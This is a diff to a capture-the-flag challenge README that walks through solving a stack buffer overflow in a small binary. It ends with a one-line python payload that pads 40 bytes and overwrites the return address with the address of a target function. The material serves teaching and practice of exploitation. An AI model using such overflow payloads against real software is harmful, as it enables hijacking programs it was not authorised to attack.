SPGryphons/GryphonCTF2018-Lite-Challenges/challenges/pwn/PartyInvite/README.md

 4005af:	c9                   	leaveq
 4005b0:	c3                   	retq
 ```
-Where the third line tells us 32 bytes is reserved for a variable.
+3. The third line tells us 32 bytes is reserved for a variable.
-3. Derive that one needs to override 32 bytes + rbp to overwrite return address.
+4. Derive that one needs to override 32 bytes + rbp (8 bytes) to overwrite return address.
-4. Also derive address of `awesome` function is `4005b1`.
+5. Also derive address of `awesome` function is `4005b1`.

 Final command to exploit local program assuming machine uses little-endian:
 `python -c 'print "a" * 40 + "\xb1\x05\x40"' | ./AwesomeParty`